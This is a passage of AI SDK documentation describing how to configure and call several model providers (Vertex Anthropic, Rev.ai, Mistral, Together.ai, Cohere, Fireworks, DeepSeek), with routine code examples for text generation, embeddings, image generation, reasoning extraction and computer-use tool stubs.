- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleAuthOptions` (object): Optional. The authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - `authClient` (object): An `AuthClient` to use.
  - `keyFilename` (string): Path to a .json, .pem, or .p12 key file.
  - `keyFile` (string): Path to a .json, .pem, or .p12 key file.
  - `credentials` (object): Object containing `client_email` and `private_key` properties, or the external account client options.
  - `clientOptions` (object): Options object passed to the constructor of the client.
  - `scopes` (string | string[]): Required scopes for the desired API request.
  - `projectId` (string): Your project ID.
  - `universeDomain` (string): The default service domain for a given Cloud universe.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex Anthropic provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
To customize the setup, use createVertexAnthropic from the same module:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleCredentials` (object): Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - `clientEmail` (string): The client email from the service account JSON file. Defaults to the contents of the `GOOGLE_CLIENT_EMAIL` environment variable.
  - `privateKey` (string): The private key from the service account JSON file. Defaults to the contents of the `GOOGLE_PRIVATE_KEY` environment variable.
  - `privateKeyId` (string): The private key ID from the service account JSON file (optional). Defaults to the contents of the `GOOGLE_PRIVATE_KEY_ID` environment variable.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku@20240307.
Some models have multi-modal capabilities.
const model = vertexAnthropic('claude-3-haiku@20240307');
You can use Anthropic language models to generate text with the generateText function:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexAnthropic('claude-3-haiku@20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
The following optional settings are available for Anthropic models:
- `sendReasoning` (boolean): Optional. Include reasoning content in requests sent to the model. Defaults to `true`. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to `false` to omit them from the request.
Reasoning
Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: vertexAnthropic('claude-3-7-sonnet@20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText and generateObject, again under the anthropic property.
When you use streamText or streamObject, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet@20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet@20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.
Computer Use
Anthropic provides three built-in tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
For more background see Anthropic's Computer Use documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = vertexAnthropic.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- `command` (string): The bash command to run. Required unless the tool is being restarted.
- `restart` (boolean, optional): Specifying `true` will restart this tool.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files:
const textEditorTool = vertexAnthropic.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for the `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for the `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for the `str_replace` or `insert` commands.
- `old_str` (string, optional): Required for the `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for the `view` command to specify the line range to show.
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
import fs from 'node:fs';

const computerTool = vertexAnthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
experimental_toToolResultContent(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mimeType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- coordinate (number[], optional): Required for the mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for the type and key actions.
These tools can be used in conjunction with the claude-3-5-sonnet-v2@20241022 model to enable more complex interactions and tasks.
Model Capabilities
The latest list of Anthropic models on Vertex AI is available in the Google Vertex AI documentation. See also the Anthropic Model Comparison.
| Model |
|---|
| claude-3-7-sonnet@20250219 |
| claude-3-5-sonnet-v2@20241022 |
| claude-3-5-sonnet@20240620 |
| claude-3-5-haiku@20241022 |
| claude-3-sonnet@20240229 |
| claude-3-haiku@20240307 |
| claude-3-opus@20240229 |
title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.
Rev.ai Provider
The Rev.ai provider contains language model support for the Rev.ai transcription API.
Setup
The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with
pnpm add @ai-sdk/revai
Provider Instance
You can import the default provider instance revai from @ai-sdk/revai:
import { revai } from '@ai-sdk/revai';
If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:
import { createRevai } from '@ai-sdk/revai';
const revai = createRevai({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Rev.ai provider instance:
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Rev.ai transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. machine.
const model = revai.transcription('machine');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: revai.transcription('machine'),
audio: await readFile('audio.mp3'),
providerOptions: { revai: { language: 'en' } },
});
The following provider options are available:
- metadata (string): Optional metadata that was provided during job submission.
- notification_config (object): Optional configuration for a callback url to invoke when processing is complete.
  - url (string): Callback url to invoke when processing is complete.
  - auth_headers (object): Optional authorization headers, if needed to invoke the callback.
- delete_after_seconds (integer): Amount of time after job completion when the job is auto-deleted.
- verbatim (boolean): Configures the transcriber to transcribe every syllable, including all false starts and disfluencies.
- rush (boolean): [HIPAA Unsupported] Only available for the human transcriber option. When set to true, your job is given higher priority.
- skip_diarization (boolean): Specify if speaker diarization will be skipped by the speech engine.
- skip_postprocessing (boolean): Only available for English and Spanish languages. User-supplied preference on whether to skip post-processing operations.
- skip_punctuation (boolean): Specify if "punct" type elements will be skipped by the speech engine.
- remove_disfluencies (boolean): When set to true, disfluencies (like 'ums' and 'uhs') will not appear in the transcript.
- remove_atmospherics (boolean): When set to true, atmospherics (like <laugh>, <affirmative>) will not appear in the transcript.
- filter_profanity (boolean): When enabled, profanities will be filtered by replacing characters with asterisks except for the first and last.
- speaker_channels_count (integer): Only available for English, Spanish and French languages. Specify the total number of unique speaker channels in the audio.
- speakers_count (integer): Only available for English, Spanish and French languages. Specify the total number of unique speakers in the audio.
- diarization_type (string): Specify the diarization type. Possible values: "standard" (default), "premium".
- custom_vocabulary_id (string): Supply the id of a pre-completed custom vocabulary submitted through the Custom Vocabularies API.
- custom_vocabularies (Array): Specify a collection of custom vocabulary to be used for this job.
- strict_custom_vocabulary (boolean): If true, only exact phrases will be used as custom vocabulary.
- summarization_config (object): Specify summarization options.
  - model (string): Model type for summarization. Possible values: "standard" (default), "premium".
  - type (string): Summarization formatting type. Possible values: "paragraph" (default), "bullets".
  - prompt (string): Custom prompt for flexible summaries (mutually exclusive with type).
- translation_config (object): Specify translation options.
  - target_languages (Array): Array of target languages for translation.
  - model (string): Model type for translation. Possible values: "standard" (default), "premium".
- language (string): Language is provided as an ISO 639-1 language code. Default is "en".
- forced_alignment (boolean): When enabled, provides improved accuracy for per-word timestamps for a transcript. Default is false. Note: this option is not available in the low_cost environment. Currently supported languages:
  - English (en, en-us, en-gb)
  - French (fr)
  - Italian (it)
  - German (de)
  - Spanish (es)
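As a sketch, several of these options can be combined in a single call (the audio file name is illustrative):

import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('meeting.mp3'), // illustrative file name
  providerOptions: {
    revai: {
      verbatim: true, // keep false starts and disfluencies
      skip_diarization: false,
      summarization_config: { type: 'bullets' },
    },
  },
});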
Model Capabilities
| Model |
|---|
| machine |
| human |
| low_cost |
| fusion |
title: Mistral AI description: Learn how to use Mistral.
Mistral AI Provider
The Mistral AI provider contains language model support for the Mistral chat API.
Setup
The Mistral provider is available in the @ai-sdk/mistral module. You can install it with
pnpm add @ai-sdk/mistral
Provider Instance
You can import the default provider instance mistral from @ai-sdk/mistral:
import { mistral } from '@ai-sdk/mistral';
If you need a customized setup, you can import createMistral from @ai-sdk/mistral
and create a provider instance with your settings:
import { createMistral } from '@ai-sdk/mistral';
const mistral = createMistral({
// custom settings
});
You can use the following optional settings to customize the Mistral provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Mistral chat API using a provider instance.
The first argument is the model id, e.g. mistral-large-latest.
Some Mistral chat models support tool calls.
const model = mistral('mistral-large-latest');
Mistral chat models also support additional model settings that are not part of the standard call settings. You can pass them as an options argument:
const model = mistral('mistral-large-latest', {
safePrompt: true, // optional safety prompt injection
});
The following optional settings are available for Mistral models:
- safePrompt (boolean): Whether to inject a safety prompt before all conversations. Defaults to false.
Document OCR
Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.
const result = await generateText({
model: mistral('mistral-small-latest'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
),
mimeType: 'application/pdf',
},
],
},
],
// optional settings:
providerOptions: {
mistral: {
documentImageLimit: 8,
documentPageLimit: 64,
},
},
});
Example
You can use Mistral language models to generate text with the generateText function:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const { text } = await generateText({
model: mistral('mistral-large-latest'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Mistral language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
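For example, a minimal streaming sketch:

import { mistral } from '@ai-sdk/mistral';
import { streamText } from 'ai';

const result = streamText({
  model: mistral('mistral-large-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

// print the text as it is generated
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}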
Model Capabilities
| Model |
|---|
| pixtral-large-latest |
| mistral-large-latest |
| mistral-small-latest |
| ministral-3b-latest |
| ministral-8b-latest |
| pixtral-12b-2409 |
Embedding Models
You can create models that call the Mistral embeddings API
using the .embedding() factory method.
const model = mistral.embedding('mistral-embed');
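You can then use it with the embed function, for example:

import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: mistral.embedding('mistral-embed'),
  value: 'sunny day at the beach',
});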
Model Capabilities
| Model | Default Dimensions |
|---|---|
| mistral-embed | 1024 |
title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.
Together.ai Provider
The Together.ai provider contains support for 200+ open-source models through the Together.ai API.
Setup
The Together.ai provider is available via the @ai-sdk/togetherai module. You can
install it with
pnpm add @ai-sdk/togetherai
Provider Instance
You can import the default provider instance togetherai from @ai-sdk/togetherai:
import { togetherai } from '@ai-sdk/togetherai';
If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai
and create a provider instance with your settings:
import { createTogetherAI } from '@ai-sdk/togetherai';
const togetherai = createTogetherAI({
apiKey: process.env.TOGETHER_AI_API_KEY ?? '',
});
You can use the following optional settings to customize the Together.ai provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the TOGETHER_AI_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.
const model = togetherai('google/gemma-2-9b-it');
Reasoning Models
Together.ai exposes the thinking of deepseek-ai/DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: togetherai('deepseek-ai/DeepSeek-R1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
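For example, a sketch of reading the extracted reasoning with generateText (the prompt is illustrative):

import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: enhancedModel, // from the wrapLanguageModel example above
  prompt: 'How many people will live in the world in 2040?',
});

console.log(reasoning); // the extracted <think> content
console.log(text); // the answer without the reasoning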
Example
You can use Together.ai language models to generate text with the generateText function:
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Together.ai language models can also be used in the streamText function
(see AI SDK Core).
The Together.ai provider also supports completion models via togetherai.completionModel() and embedding models via togetherai.textEmbeddingModel(), following the example code above.
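A quick sketch of creating both model types (the embedding model id is an assumption for illustration):

// completion model, following the language model example above
const completionModel = togetherai.completionModel(
  'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo',
);

// embedding model (model id assumed for illustration)
const embeddingModel = togetherai.textEmbeddingModel(
  'togethercomputer/m2-bert-80M-8k-retrieval',
);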
Model Capabilities
| Model |
|---|
| meta-llama/Meta-Llama-3.3-70B-Instruct-Turbo |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo |
| mistralai/Mixtral-8x22B-Instruct-v0.1 |
| mistralai/Mistral-7B-Instruct-v0.3 |
| deepseek-ai/DeepSeek-V3 |
| google/gemma-2b-it |
| Qwen/Qwen2.5-72B-Instruct-Turbo |
| databricks/dbrx-instruct |
Image Models
You can create Together.ai image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});
You can pass optional provider-specific request parameters using the providerOptions argument.
import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
size: '512x512',
// Optional additional provider-specific request parameters
providerOptions: {
togetherai: {
steps: 40,
},
},
});
For a complete list of available provider-specific options, see the Together.ai Image Generation API Reference.
Model Capabilities
Together.ai image models support various image dimensions that vary by model. Common sizes include 512x512, 768x768, and 1024x1024, with some models supporting up to 1792x1792. The default size is 1024x1024.
| Available Models |
|---|
| stabilityai/stable-diffusion-xl-base-1.0 |
| black-forest-labs/FLUX.1-dev |
| black-forest-labs/FLUX.1-dev-lora |
| black-forest-labs/FLUX.1-schnell |
| black-forest-labs/FLUX.1-canny |
| black-forest-labs/FLUX.1-depth |
| black-forest-labs/FLUX.1-redux |
| black-forest-labs/FLUX.1.1-pro |
| black-forest-labs/FLUX.1-pro |
| black-forest-labs/FLUX.1-schnell-Free |
title: Cohere description: Learn how to use the Cohere provider for the AI SDK.
Cohere Provider
The Cohere provider contains language and embedding model support for the Cohere chat API.
Setup
The Cohere provider is available in the @ai-sdk/cohere module. You can install it with
pnpm add @ai-sdk/cohere
Provider Instance
You can import the default provider instance cohere from @ai-sdk/cohere:
import { cohere } from '@ai-sdk/cohere';
If you need a customized setup, you can import createCohere from @ai-sdk/cohere
and create a provider instance with your settings:
import { createCohere } from '@ai-sdk/cohere';
const cohere = createCohere({
// custom settings
});
You can use the following optional settings to customize the Cohere provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Cohere chat API using a provider instance.
The first argument is the model id, e.g. command-r-plus.
Some Cohere chat models support tool calls.
const model = cohere('command-r-plus');
Example
You can use Cohere language models to generate text with the generateText function:
import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';
const { text } = await generateText({
model: cohere('command-r-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cohere language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Model Capabilities
| Model |
|---|
| command-a-03-2025 |
| command-r-plus |
| command-r |
| command |
| command-light |
Embedding Models
You can create models that call the Cohere embed API
using the .embedding() factory method.
const model = cohere.embedding('embed-english-v3.0');
Cohere embedding models support additional settings. You can pass them as an options argument:
const model = cohere.embedding('embed-english-v3.0', {
inputType: 'search_document',
});
The following optional settings are available for Cohere embedding models:
- inputType ('search_document' | 'search_query' | 'classification' | 'clustering'): Specifies the type of input passed to the model. Default is search_query.
  - search_document: Used for embeddings stored in a vector database for search use-cases.
  - search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
  - classification: Used for embeddings passed through a text classifier.
  - clustering: Used for embeddings run through a clustering algorithm.
- truncate ('NONE' | 'START' | 'END'): Specifies how the API will handle inputs longer than the maximum token length. Default is END.
  - NONE: An error is returned when the input exceeds the maximum input token length.
  - START: Discards the start of the input until the remaining input is exactly the maximum input token length for the model.
  - END: Discards the end of the input until the remaining input is exactly the maximum input token length for the model.
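For example, embedding a document for search use-cases (a minimal sketch):

import { cohere } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.embedding('embed-english-v3.0', {
    inputType: 'search_document',
  }),
  value: 'sunny day at the beach',
});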
Model Capabilities
| Model | Embedding Dimensions |
|---|---|
| embed-english-v3.0 | 1024 |
| embed-multilingual-v3.0 | 1024 |
| embed-english-light-v3.0 | 384 |
| embed-multilingual-light-v3.0 | 384 |
| embed-english-v2.0 | 4096 |
| embed-english-light-v2.0 | 1024 |
| embed-multilingual-v2.0 | 768 |
title: Fireworks description: Learn how to use Fireworks models with the AI SDK.
Fireworks Provider
Fireworks is a platform for running and testing LLMs through their API.
Setup
The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with
pnpm add @ai-sdk/fireworks
Provider Instance
You can import the default provider instance fireworks from @ai-sdk/fireworks:
import { fireworks } from '@ai-sdk/fireworks';
If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks
and create a provider instance with your settings:
import { createFireworks } from '@ai-sdk/fireworks';
const fireworks = createFireworks({
apiKey: process.env.FIREWORKS_API_KEY ?? '',
});
You can use the following optional settings to customize the Fireworks provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create Fireworks models using a provider instance.
The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:
const model = fireworks('accounts/fireworks/models/firefunction-v1');
Reasoning Models
Fireworks exposes the thinking of deepseek-r1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
Example
You can use Fireworks language models to generate text with the generateText function:
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text } = await generateText({
model: fireworks('accounts/fireworks/models/firefunction-v1'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Fireworks language models can also be used in the streamText function
(see AI SDK Core).
Completion Models
You can create models that call the Fireworks completions API using the .completion() factory method:
const model = fireworks.completion('accounts/fireworks/models/firefunction-v1');
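Completion models can be used with the same functions as chat models. A minimal generateText sketch (the prompt is illustrative):

import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks.completion('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Once upon a time,',
});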
Model Capabilities
| Model |
|---|
| accounts/fireworks/models/deepseek-r1 |
| accounts/fireworks/models/deepseek-v3 |
| accounts/fireworks/models/llama-v3p1-405b-instruct |
| accounts/fireworks/models/llama-v3p1-8b-instruct |
| accounts/fireworks/models/llama-v3p2-3b-instruct |
| accounts/fireworks/models/llama-v3p3-70b-instruct |
| accounts/fireworks/models/mixtral-8x7b-instruct-hf |
| accounts/fireworks/models/mixtral-8x22b-instruct |
| accounts/fireworks/models/qwen2p5-coder-32b-instruct |
| accounts/fireworks/models/llama-v3p2-11b-vision-instruct |
| accounts/fireworks/models/yi-large |
Embedding Models
You can create models that call the Fireworks embeddings API using the .textEmbeddingModel() factory method:
const model = fireworks.textEmbeddingModel(
'accounts/fireworks/models/nomic-embed-text-v1',
);
Image Models
You can create Fireworks image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { fireworks } from '@ai-sdk/fireworks';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model Capabilities
For all models supporting aspect ratios, the following aspect ratios are supported:
1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
For all models supporting size, the following sizes are supported:
640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024 x 1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640
| Model | Dimensions Specification |
|---|---|
| accounts/fireworks/models/flux-1-dev-fp8 | Aspect Ratio |
| accounts/fireworks/models/flux-1-schnell-fp8 | Aspect Ratio |
| accounts/fireworks/models/playground-v2-5-1024px-aesthetic | Size |
| accounts/fireworks/models/japanese-stable-diffusion-xl | Size |
| accounts/fireworks/models/playground-v2-1024px-aesthetic | Size |
| accounts/fireworks/models/SSD-1B | Size |
| accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | Size |
For more details, see the Fireworks models page.
Stability AI Models
Fireworks also offers several Stability AI models that are backed by Stability AI API keys and endpoints. The AI SDK Fireworks provider does not currently support these models:
| Model ID |
|---|
| accounts/stability/models/sd3-turbo |
| accounts/stability/models/sd3-medium |
| accounts/stability/models/sd3 |
title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.
DeepSeek Provider
The DeepSeek provider offers access to powerful language models through the DeepSeek API, including their DeepSeek-V3 model.
API keys can be obtained from the DeepSeek Platform.
Setup
The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:
pnpm add @ai-sdk/deepseek
Provider Instance
You can import the default provider instance deepseek from @ai-sdk/deepseek:
import { deepseek } from '@ai-sdk/deepseek';
For custom configuration, you can import createDeepSeek and create a provider instance with your settings:
import { createDeepSeek } from '@ai-sdk/deepseek';
const deepseek = createDeepSeek({
apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepSeek provider instance:
- baseURL (string): Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com/v1.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { deepseek } from '@ai-sdk/deepseek';
